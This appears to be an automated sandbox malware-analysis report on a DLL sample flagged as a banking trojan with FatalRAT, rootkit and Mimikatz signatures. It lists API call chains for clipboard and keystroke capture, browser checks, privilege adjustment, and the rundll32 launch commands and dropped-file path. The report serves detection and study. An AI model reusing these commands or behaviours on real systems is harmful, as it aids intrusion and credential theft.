                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100026B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,9_2_100026B0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10002770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,9_2_10002770
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100029D0 printf,OpenClipboard,GlobalAlloc,GlobalLock,strstr,strstr,strstr,atoi,strstr,strstr,strstr,atoi,Sleep,Sleep,atoi,strstr,Sleep,Sleep,printf,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,9_2_100029D0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10017BB0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,9_2_10017BB0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100025B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,GlobalUnlock,CloseClipboard,5_2_100025B0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1000B840 GetKeyState,Sleep,lstrlenA,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrcatA,lstrlenA,lstrcatA,lstrcatA,5_2_1000B840

                  E-Banking Fraud

                  barindex
                  Checks if browser processes are running
                  Source: C:\Windows\System32\loaddll32.exeCode function: malloc,SetEvent,GetUserNameA,_strcmpi,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,free,strstr,strstr,strstr,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,_strcmpi,free,free,CloseHandle,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,free, Applications\iexplore.exe5_2_1000BFE0
                  Source: C:\Windows\System32\loaddll32.exeCode function: malloc,SetEvent,GetUserNameA,_strcmpi,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,free,strstr,strstr,strstr,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,_strcmpi,free,free,CloseHandle,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,free, Applications\iexplore.exe5_2_1000BFE0
                  Source: C:\Windows\System32\loaddll32.exeCode function: malloc,SetEvent,GetUserNameA,_strcmpi,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,free,strstr,strstr,strstr,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,_strcmpi,free,free,CloseHandle,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,free, Applications\iexplore.exe5_2_1000BFE0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: malloc,SetEvent,GetUserNameA,_strcmpi,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,free,strstr,strstr,strstr,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,_strcmpi,free,free,CloseHandle,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,free, Applications\iexplore.exe9_2_1000BFE0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: malloc,SetEvent,GetUserNameA,_strcmpi,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,free,strstr,strstr,strstr,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,_strcmpi,free,free,CloseHandle,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,free, Applications\iexplore.exe9_2_1000BFE0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: malloc,SetEvent,GetUserNameA,_strcmpi,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,free,strstr,strstr,strstr,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,_strcmpi,free,free,CloseHandle,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,free, Applications\iexplore.exe9_2_1000BFE0

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: l10U7QN0CY.dll, type: SAMPLEMatched rule: Detects Mimikatz strings Author: Florian Roth
                  Source: l10U7QN0CY.dll, type: SAMPLEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: l10U7QN0CY.dll, type: SAMPLEMatched rule: Detects FatalRAT Author: ditekSHen
                  Source: 9.2.rundll32.exe.1010b380.2.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 9.2.rundll32.exe.1010b380.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 5.2.loaddll32.exe.1010b380.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 9.2.rundll32.exe.100fbd38.1.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 5.2.loaddll32.exe.1010b380.2.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 10.2.rundll32.exe.1010b380.2.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 10.2.rundll32.exe.1010b380.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 5.2.loaddll32.exe.100fbd38.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 5.2.loaddll32.exe.100fbd38.1.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 10.2.rundll32.exe.100fbd38.1.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 10.2.rundll32.exe.100fbd38.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 9.2.rundll32.exe.100fbd38.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
                  Source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects FatalRAT Author: ditekSHen
                  Source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
                  Source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects FatalRAT Author: ditekSHen
                  Source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
                  Source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects FatalRAT Author: ditekSHen
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1000E670: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,5_2_1000E670
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10010190 AttachConsole,AttachConsole,Sleep,AttachConsole,GetConsoleProcessList,GetConsoleProcessList,#823,GetConsoleProcessList,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,#825,FreeConsole,FreeConsole,Sleep,FreeConsole,TerminateProcess,swprintf,SHDeleteKeyA,OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryA,GetSystemDirectoryA,lstrcatA,lstrcatA,DeleteFileA,DeleteFileA,GetSystemDirectoryA,lstrcatA,DeleteFileA,LocalFree,free,free,free,GetWindowsDirectoryA,GetCurrentProcess,IsWow64Process,DeleteFileA,SetServiceStatus,ExitProcess,5_2_10010190
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10010640 ExitWindowsEx,5_2_10010640
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1000E670 CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,5_2_1000E670
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10010640 ExitWindowsEx,9_2_10010640
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1000E670 CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,9_2_1000E670
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100580605_2_10058060
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100810905_2_10081090
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100971905_2_10097190
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100041D05_2_100041D0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1003B2105_2_1003B210
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1002A2605_2_1002A260
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100932B05_2_100932B0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1007E2D05_2_1007E2D0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1003E4705_2_1003E470
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100373F05_2_100373F0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1003C4125_2_1003C412
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001A4205_2_1001A420
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1005B4205_2_1005B420
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1000A5805_2_1000A580
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1007E5805_2_1007E580
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100965805_2_10096580
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100935E05_2_100935E0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100945E05_2_100945E0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100356975_2_10035697
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100287B05_2_100287B0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100297D05_2_100297D0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1003E4905_2_1003E490
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100308D05_2_100308D0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100599005_2_10059900
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100809105_2_10080910
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1007E9605_2_1007E960
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10095A105_2_10095A10
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1005BAB05_2_1005BAB0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1007FAF05_2_1007FAF0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10081AF05_2_10081AF0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10091B305_2_10091B30
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1003BB905_2_1003BB90
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10082D705_2_10082D70
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10059DB05_2_10059DB0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10083DB05_2_10083DB0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1007ADD05_2_1007ADD0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10084DD05_2_10084DD0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10037E105_2_10037E10
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1005AEA05_2_1005AEA0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10093F405_2_10093F40
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10023F605_2_10023F60
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10078F705_2_10078F70
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100580609_2_10058060
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100810909_2_10081090
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100971909_2_10097190
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100041D09_2_100041D0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B2109_2_1003B210
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002A2609_2_1002A260
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100932B09_2_100932B0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1007E2D09_2_1007E2D0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003E4709_2_1003E470
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100373F09_2_100373F0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003C4129_2_1003C412
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001A4209_2_1001A420
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1005B4209_2_1005B420
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1000A5809_2_1000A580
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1007E5809_2_1007E580
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100965809_2_10096580
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100935E09_2_100935E0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100945E09_2_100945E0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100356979_2_10035697
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100287B09_2_100287B0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100297D09_2_100297D0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003E4909_2_1003E490
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100308D09_2_100308D0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100599009_2_10059900
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100809109_2_10080910
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1007E9609_2_1007E960
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10095A109_2_10095A10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1005BAB09_2_1005BAB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1007FAF09_2_1007FAF0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10081AF09_2_10081AF0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10091B309_2_10091B30
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003BB909_2_1003BB90
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10082D709_2_10082D70
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10059DB09_2_10059DB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10083DB09_2_10083DB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1007ADD09_2_1007ADD0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10084DD09_2_10084DD0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037E109_2_10037E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1005AEA09_2_1005AEA0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10093F409_2_10093F40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10023F609_2_10023F60
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10078F709_2_10078F70
                  Source: C:\Windows\System32\loaddll32.exeCode function: String function: 1001B690 appears 31 times
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001B690 appears 31 times
                  Source: l10U7QN0CY.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                  Source: l10U7QN0CY.dll, type: SAMPLEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: l10U7QN0CY.dll, type: SAMPLEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: l10U7QN0CY.dll, type: SAMPLEMatched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
                  Source: 9.2.rundll32.exe.1010b380.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 9.2.rundll32.exe.1010b380.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 5.2.loaddll32.exe.1010b380.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 9.2.rundll32.exe.100fbd38.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 5.2.loaddll32.exe.1010b380.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 10.2.rundll32.exe.1010b380.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 10.2.rundll32.exe.1010b380.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 5.2.loaddll32.exe.100fbd38.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 5.2.loaddll32.exe.100fbd38.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 10.2.rundll32.exe.100fbd38.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 10.2.rundll32.exe.100fbd38.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 9.2.rundll32.exe.100fbd38.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
                  Source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
                  Source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
                  Source: l10U7QN0CY.dllBinary string: \Device\QAssist\DosDevices\QAssistQAssist!InitializeDevice[irql:%d,pid:%d][error]: Error, device creation failed with code:%08x
                  Source: l10U7QN0CY.dllBinary string: \Device\QAssist\DosDevices\QAssist
                  Source: l10U7QN0CY.dllBinary string: \??\\Device\\SystemRoot\QAssist!CheckProtectedOperation[irql:%d,pid:%d][warning]: Warning, can't update initial state for process: %p
                  Source: l10U7QN0CY.dllBinary string: \Device\
                  Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winDLL@20/1@0/0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100290C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,5_2_100290C0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001B690 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,5_2_1001B690
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100290C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,9_2_100290C0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001B690 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,9_2_1001B690
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001B250 GetTickCount,GetVersionExA,getsockname,GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,GetDriveTypeA,GetDiskFreeSpaceExA,GetTickCount,GetTickCount,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetLastInputInfo,GetTickCount,_access,lstrcpyA,5_2_1001B250
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100270F0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,5_2_100270F0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001A100 CoInitialize,CoCreateInstance,GetDriveTypeA,SysFreeString,SysFreeString,CoUninitialize,5_2_1001A100
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001EFD0 Shellex,#823,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetCurrentThreadId,PostThreadMessageA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetCommandLineA,CreateMutexA,GetLastError,strstr,Sleep,Sleep,OpenSCManagerA,OpenServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,ExitProcess,CloseServiceHandle,CloseServiceHandle,Sleep,Sleep,sprintf,ExitProcess,sprintf,sprintf,GetModuleFileNameA,sprintf,Sleep,sprintf,ExitProcess,Sleep,Sleep,Sleep,Sleep,5_2_1001EFD0
                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\Public\Documents\MM\svchos1.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1460:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1424:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_03
                  Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\l10U7QN0CY.dll,Shellex
                  Source: l10U7QN0CY.dllReversingLabs: Detection: 68%
                  Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll"
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll",#1
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\l10U7QN0CY.dll,Shellex
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll",#1
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll",#1Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\l10U7QN0CY.dll,ShellexJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll",#1Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MMJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MMJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MMJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MMJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: mfc42.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: msvcp60.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: netapi32.dllJump to behavior
